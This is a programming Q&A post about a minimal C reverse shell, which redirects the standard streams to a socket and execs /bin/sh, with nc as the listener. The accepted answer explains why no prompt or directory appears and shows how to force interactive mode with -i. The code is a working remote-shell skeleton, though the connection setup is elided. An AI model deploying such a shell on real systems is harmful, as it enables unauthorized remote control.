# Print current directory in reverse shell

Tags: c, shell, sockets, reverse-shell

I tried to build a very little reversed shell in C.

The connection works, the commands are also executed, but I wonder how it's possible to print the current directory. My code so far:

Client:

```
// [...]
// creating socket
// connect

void handle_connection(socket_t* sock, char** argv, char** env) {
    // redirect stdout, stdin, stderr
    for (int i = 0; i <= 2; i++)
        dup2(*sock, i);

    execve("/bin/sh", argv, env);
}
```

On the server side, I simply use nc which works fine. But the current directory is not printed out as usual. F.ex. if I send a "cd [...]", there is no output at all.

How can I send the current directory to the server?

Thanks for any help.

Answer (score 1, accepted):

If you want to see the current directory, run the `pwd` command.

The `cd` command does not print any output. Therefore you'll not see any output.

If you run the shell interactively though, the shell prints a [prompt](https://en.wikipedia.org/wiki/Command-line_interface#Command_prompt) after it has executed a command. Some shells, or depending on your configuration, that prompt might include the current working directory.

But when you connect a socket to the shells stdin/out/err, the shell figures out it is not in interactive mode, and it will not present a prompt. Simply running the `cd` command will give you no output.

You can force the shell to interactive mode, in which case it should print the prompt after each command, run

```
execl("/bin/sh", "/bin/sh/", "-i", NULL);
```

(Or find some way of adding the "-i" argument in your execve() call)